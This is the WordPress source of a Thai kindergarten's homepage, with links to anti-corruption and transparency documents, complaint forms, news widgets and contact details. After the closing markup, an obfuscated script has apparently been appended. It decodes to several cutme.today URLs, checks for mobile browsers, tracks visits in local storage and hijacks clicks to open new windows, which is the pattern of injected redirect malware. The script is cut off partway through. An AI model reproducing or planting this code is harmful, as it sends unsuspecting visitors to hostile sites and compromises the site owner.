data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 